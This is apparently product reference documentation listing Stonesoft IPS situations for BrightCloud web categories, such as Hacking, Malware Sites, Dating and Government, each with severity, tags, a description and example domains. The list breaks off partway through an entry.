Description: The web page belongs to the BrightCloud category "Computer and Internet Info". The category is described as follows: General computer and Internet sites, technical information. Examples include: * http://netcraft.com * http://ranking.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Computer-and-Internet-Security

About this situation: BrightCloud category Computer and Internet Security
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Technology, Business Usage
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Computer and Internet Security". The category is described as follows: Computer/Internet security, security discussion groups. Examples include: * http://siteadvisor.com * http://kaspersky.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Confirmed-SPAM-Sources

About this situation: BrightCloud category Confirmed SPAM Sources
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Security Risk
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Confirmed SPAM Sources". The category is described as follows: URLs from which large volumes of SPAM originates. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Content-Delivery-Networks

About this situation: BrightCloud category Content Delivery Networks
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Technology
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Content Delivery Networks". The category is described as follows: Delivery of content and data for third parties, including ads, media, files, images, and video. Examples include: * http://akamaitech.net * http://edgestream.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Cult-and-Occult

About this situation: BrightCloud category Cult and Occult
Context: HTTP BrightCloud Category
Severity: 1
Tags: Society / Education / Religion, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Cult and Occult". The category is described as follows: Methods, means of instruction, or other resources to interpret, affect or influence real events through the use of astrology, spells, curses, magic powers, satanic or supernatural beings. Examples include: * http://horoscopes.com * http://astronet.hu $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Dating

About this situation: BrightCloud category Dating
Context: HTTP BrightCloud Category
Severity: 1
Tags: Lifestyle, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Dating". The category is described as follows: Dating websites focused on establishing personal relationships. Examples include: * http://dating.com * http://askmen.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Dead-Sites

About this situation: BrightCloud category Dead Sites (db Ops only)
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Dead Sites (db Ops only)". The category is described as follows: These are dead sites that do not respond to http queries. Examples include: * http://randomrpg.com * http://spyware-checker.net $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Dynamically-Generated-Content

About this situation: BrightCloud category Dynamically Generated Content
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Technology
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Dynamically Generated Content". The category is described as follows: Domains that generate content dynamically based on arguments to their URL or other information (like geo-location) on the incoming web request. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Educational-Institutions

About this situation: BrightCloud category Educational Institutions
Context: HTTP BrightCloud Category
Severity: 1
Tags: Society / Education / Religion, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Educational Institutions". The category is described as follows: Pre-school, elementary, secondary, high school, college, university, and vocational school and other educational content and information,including enrollment, tuition, and syllabus. Examples include: * http://mit.edu * http://carlsbadusd.k12.ca.us $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Entertainment-and-Arts

About this situation: BrightCloud category Entertainment and Arts
Context: HTTP BrightCloud Category
Severity: 1
Tags: Entertainment / Culture, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Entertainment and Arts". The category is described as follows: Motion pictures, videos, television, music and programming guides, books, comics, movie theatres, galleries, artists or reviews on entertainment. Performing arts (theatre, vaudeville, opera, symphonies, etc.). Museums, galleries, artist sites (sculpture, photography, etc.). Examples include: * http://booksky.org * http://etonline.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Fashion-and-Beauty

About this situation: BrightCloud category Fashion and Beauty
Context: HTTP BrightCloud Category
Severity: 1
Tags: Lifestyle, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Fashion and Beauty". The category is described as follows: Fashion or glamour magazines, beauty, clothes, cosmetics, style. Examples include: * http://beauty.ivillage.com * http://genejuarez.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Financial-Services

About this situation: BrightCloud category Financial Services
Context: HTTP BrightCloud Category
Severity: 1
Tags: Business / Services, Business Usage
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Financial Services". The category is described as follows: Banking services and other types of financial information, such as loans, accountancy, actuaries, banks, mortgages, and general insurance companies. Does not include sites that offer market information, brokerage or trading services. Examples include: * http://firstpremierbankcards.com * http://any-purpose-loan-uk.co.uk $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Gambling

About this situation: BrightCloud category Gambling
Context: HTTP BrightCloud Category
Severity: 1
Tags: Games / Gambling, Productivity Loss, Legal Liability
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Gambling". The category is described as follows: Gambling or lottery web sites that invite the use of real or virtual money. Information or advice for placing wagers, participating in lotteries, gambling, or running numbers. Virtual casinos and offshore gambling ventures. Sports picks and betting pools. Virtual sports and fantasy leagues that offer large rewards or request significant wagers. Hotel and Resort sites that do not enable gambling on the site are categorized in Travel or Local Information. Examples include: * http://gambling.com * http://zjlottery.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Games

About this situation: BrightCloud category Games
Context: HTTP BrightCloud Category
Severity: 1
Tags: Games / Gambling, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Games". The category is described as follows: Game playing or downloading, video games, computer games, electronic games, tips, and advice on games or how to obtain cheat codes. Also includes sites dedicated to selling board games as well as journals and magazines dedicated to game playing. Includes sites that support or host online sweepstakes and giveaways. Examples include: * http://duowan.com * http://imdb.com/sections/games $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Government

About this situation: BrightCloud category Government
Context: HTTP BrightCloud Category
Severity: 1
Tags: Society / Education / Religion, Business Usage
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Government". The category is described as follows: Information on government, government agencies and government services such as taxation, public, and emergency services. Also includes sites that discuss or explain laws of various governmental entities. Includes local, county, state, and national government sites. Examples include: * http://nasa.gov * http://premier-ministre.gouv.fr $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Gross

About this situation: BrightCloud category Gross
Context: HTTP BrightCloud Category
Severity: 1
Tags: Mature / Violent, Legal Liability
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Gross". The category is described as follows: Vomit and other bodily functions, bloody clothing, etc. Examples include: * http://ratemyvomit.com/ * http://bloody-disgusting.com/ * http://bloodshows.com/ $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Hacking

About this situation: BrightCloud category Hacking
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Security Risk, Legal Liability
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Hacking". The category is described as follows: Illegal or questionable access to or the use of communications equipment/software. Development and distribution of programs that may allow compromise of networks and systems. Avoidance of licensing and fees for computer programs and other systems. Examples include: * http://darkwarez.pl * http://crackers-team.net $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Hate-and-Racism

About this situation: BrightCloud category Hate and Racism
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Legal Liability
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Hate and Racism". The category is described as follows: Sites that support content and languages or hate crime and racism such as Nazi, neo-Nazi, Ku Klux Klan, etc. Examples include: * http://nazi-lauck-nsdapao.com/ * http://americannaziparty.com/ * http://kkk.com/ $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Health-and-Medicine

About this situation: BrightCloud category Health and Medicine
Context: HTTP BrightCloud Category
Severity: 1
Tags: Society / Education / Religion, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Health and Medicine". The category is described as follows: General health, fitness, well-being, including traditional and non-traditional methods and topics. Medical information on ailments, various conditions, dentistry, psychiatry, optometry, and other specialties. Hospitals and doctor offices. Medical insurance. Cosmetic surgery. Examples include: * http://webmd.com * http://health-centerlive.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Home-and-Garden

About this situation: BrightCloud category Home and Garden
Context: HTTP BrightCloud Category
Severity: 1
Tags: Lifestyle, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Home and Garden". The category is described as follows: Home issues and products, including maintenance, home safety, decor, cooking, gardening, home electronics, design, etc. Examples include: * http://homedepot.com * http://waysidegardens.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Hunting-and-Fishing

About this situation: BrightCloud category Hunting and Fishing
Context: HTTP BrightCloud Category
Severity: 1
Tags: Lifestyle, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Hunting and Fishing". The category is described as follows: Sport hunting, gun clubs, and fishing. Examples include: * http://qfis.com * http://wildlifelicense.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Illegal

About this situation: BrightCloud category Illegal
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Legal Liability
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Illegal". The category is described as follows: Criminal activity, how not to get caught, copyright and intellectual property violations, etc. Examples include: * http://newid.com/ * http://newidcards.com/ * http://kidneykidney.com/ $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Image-and-Video-Search

About this situation: BrightCloud category Image and Video Search
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Communication
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Image and Video Search". The category is described as follows: Photo and image searches, online photo albums/digital photo exchange, image hosting. Examples include: * http://images.google.fr * http://images.myetone.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Individual-Stock-Advice-and-Tools

About this situation: BrightCloud category Individual Stock Advice and Tools
Context: HTTP BrightCloud Category
Severity: 1
Tags: Business / Services, Business Usage
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Individual Stock Advice and Tools". The category is described as follows: Promotion and facilitation of securities trading and management of investment assets. Also includes information on financial investment strategies, quotes, and news. Examples include: * http://stockstar.com * http://morningstar.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Internet-Communications

About this situation: BrightCloud category Internet Communications
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Communication, Network Bandwidth Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Internet Communications". The category is described as follows: Internet telephony, messaging, VoIP services, Wi-Fi, and related businesses. This includes IMs and chat rooms. Examples include: * http://skype.com * http://evaphone.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Internet-Portals

About this situation: BrightCloud category Internet Portals
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Communication, Business Usage
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Internet Portals". The category is described as follows: Web sites that aggregate a broader set of internet content and topics, and which typically serve as the starting point for an end user. Examples include: * http://yahoo.com * http://qq.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Job-Search

About this situation: BrightCloud category Job Search
Context: HTTP BrightCloud Category
Severity: 1
Tags: Business / Services, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Job Search". The category is described as follows: Assistance in finding employment, and tools for locating prospective employers, or employers looking for employees. Examples include: * http://linkedin.com/jobs * http://51job.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Keyloggers-and-Monitoring

About this situation: BrightCloud category Keyloggers and Monitoring
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Security Risk
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Keyloggers and Monitoring". The category is described as follows: Downloads and discussion of software agents that track a users keystrokes or monitor their web surfing habits. Examples include: * http://keylogger.org * http://spy-tools-directory.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Kids

About this situation: BrightCloud category Kids
Context: HTTP BrightCloud Category
Severity: 1
Tags: Entertainment / Culture, Business Usage, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Kids". The category is described as follows: Sites designed specifically for children and teenagers. Examples include: * http://disney.go.com * http://kids.yahoo.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Legal

About this situation: BrightCloud category Legal
Context: HTTP BrightCloud Category
Severity: 1
Tags: Business / Services, Business Usage
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Legal". The category is described as follows: Legal websites, law firms, discussions and analysis of legal issues. Examples include: * http://employmentbuddy.com * http://free-law-library.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_License-Exceeded

About this situation: BrightCloud Categorization License Exceeded
Context: HTTP BrightCloud Category
Severity: 5
Tags: BrightCloud System Situations
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1505-5242
Description: The configuration requires BrightCloud categorization for the web pages, but the server returns "license exceeded" error. This could be caused by exceeding request limits of the license. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_License-Expired

About this situation: BrightCloud Categorization License Expired
Context: HTTP BrightCloud Category
Severity: 5
Tags: BrightCloud System Situations
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1505-5242
Description: The configuration requires BrightCloud categorization for the web pages, but the server returns "license expired" error. Please verify validity of your URL filtering service license. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_License-In-Use

About this situation: BrightCloud Categorization License Already In Use
Context: HTTP BrightCloud Category
Severity: 5
Tags: BrightCloud System Situations
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1505-5242
Description: The configuration requires BrightCloud categorization for the web pages, but the server returns "license in use" error. This could be a license configuration problem. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Local-Information

About this situation: BrightCloud category Local Information
Context: HTTP BrightCloud Category
Severity: 1
Tags: Society / Education / Religion, Business Usage
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Local Information ". The category is described as follows: City guides and tourist information, including restaurants, area / regional information, and local points of interest. Examples include: * http://downtownlittlerock.com * http://sandiegorestaurants.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Local-Service-Error

About this situation: BrightCloud Categorization Local Service Error
Context: HTTP BrightCloud Category
Severity: 5
Tags: BrightCloud System Situations
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1505-5242
Description: The configuration requires BrightCloud categorization for the web pages, but the server returns an error indicating client-side malfunction. If the problem persists, please contact your Stonesoft product support. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Malware-Sites

About this situation: BrightCloud category Malware Sites
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Security Risk
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Malware Sites". The category is described as follows: Malicious content including executables, drive-by infection sites, malicious scripts, viruses, trojans, and code. Examples include: * http://loveingod.org * http://666ccc.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Marijuana

About this situation: BrightCloud category Marijuana
Context: HTTP BrightCloud Category
Severity: 1
Tags: Drugs, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Marijuana". The category is described as follows: Marijuana use, cultivation, history, culture, legal issues. Examples include: * http://howtogrowmarijuana.com * http://cannaweed.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Military

About this situation: BrightCloud category Military
Context: HTTP BrightCloud Category
Severity: 1
Tags: Society / Education / Religion, Business Usage
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Military". The category is described as follows: Information on military branches. armed services, and military history. Examples include: * http://pentagon.mil * http://goarmy.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Motor-Vehicles

About this situation: BrightCloud category Motor Vehicles
Context: HTTP BrightCloud Category
Severity: 1
Tags: Purchasing, Productivity Loss, Business Usage
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Motor Vehicles". The category is described as follows: Car reviews, vehicle purchasing or sales tips, parts catalogs Auto trading, photos, discussion of vehicles including motorcycles, boats, cars, trucks and RVs Journals and magazines on vehicle modifications. Examples include: * http://hotautoweb.com * http://51bmw.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Music

About this situation: BrightCloud category Music
Context: HTTP BrightCloud Category
Severity: 1
Tags: Entertainment / Culture, Network Bandwidth Loss, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Music". The category is described as follows: Music sales, distribution, streaming, information on musical groups and performances, lyrics, and the music business. Examples include: * http://itunes.com * http://musicamp3.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_News-and-Media

About this situation: BrightCloud category News and Media
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Communication, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "News and Media". The category is described as follows: Current events or contemporary issues of the day. Also includes radio stations and magazines, newspapers online, headline news sites, newswire services, and personalized news services, and weather sites. Examples include: * http://abcnews.go.com * http://weather.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Nudity

About this situation: BrightCloud category Nudity
Context: HTTP BrightCloud Category
Severity: 1
Tags: Pornography / Nudity, Legal Liability, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Nudity". The category is described as follows: Nude or seminude depictions of the human body. These depictions are not necessarily sexual in intent or effect, but may include sites containing nude paintings or photo galleries of artistic nature. This category also includes nudist or naturist sites that contain pictures of nude individuals. Examples include: * http://uuuba.com * http://canal96.com/extra/strange/wwbeauty $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Offline-Unavailable

About this situation: Offline BrightCloud category information unavailable
Context: HTTP BrightCloud Category
Severity: 1
Tags: BrightCloud System Situations
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-1505-5242
Description: Offline database didn't contain category information for the request and online query could not be performed. This may be caused by network or URL filtering configuration error, or online queries being explicitly prohibited by the URL filtering configuration. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Online-Greeting-cards

About this situation: BrightCloud category Online Greeting cards
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Communication, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Online Greeting cards". The category is described as follows: Online Greeting card sites. Examples include: * http://123greetings.com * http://free-birthday-cards.net $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Open-HTTP-Proxies

About this situation: BrightCloud category Open HTTP Proxies
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Security Risk
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Open HTTP Proxies". The category is described as follows: URLs and IPs that may be used as HTTP proxies. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Parked-Domains

About this situation: BrightCloud category Parked Domains
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Productivity Loss, Security Risk
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Parked Domains". The category is described as follows: Parked domains are URLs which host limited content or click-through ads which may generate revenue for the hosting entities but generally do not contain content useful to the end user. Also includes Under Construction, folders, and web server default home pages. Examples include: * http://000.com * http://buythisdomain.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Pay-to-Surf

About this situation: BrightCloud category Pay to Surf
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Pay to Surf". The category is described as follows: Sites that pay users in the form of cash or prizes, for clicking on or reading specific links, email, or web pages. Examples include: * http://freepay.com * http://clicu.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Peer-to-Peer

About this situation: BrightCloud category Peer to Peer
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Network Bandwidth Loss, Productivity Loss, Security Risk, Legal Liability
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Peer to Peer". The category is described as follows: Peer to peer clients and access. Includes torrents, music download programs. Examples include: * http://sourceforge.net/projects/xmule * http://bitcomet.com/ $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Personal-sites-and-Blogs

About this situation: BrightCloud category Personal sites and Blogs
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Communication, Productivity Loss
First detected in: sgpkg-ips-271-4219
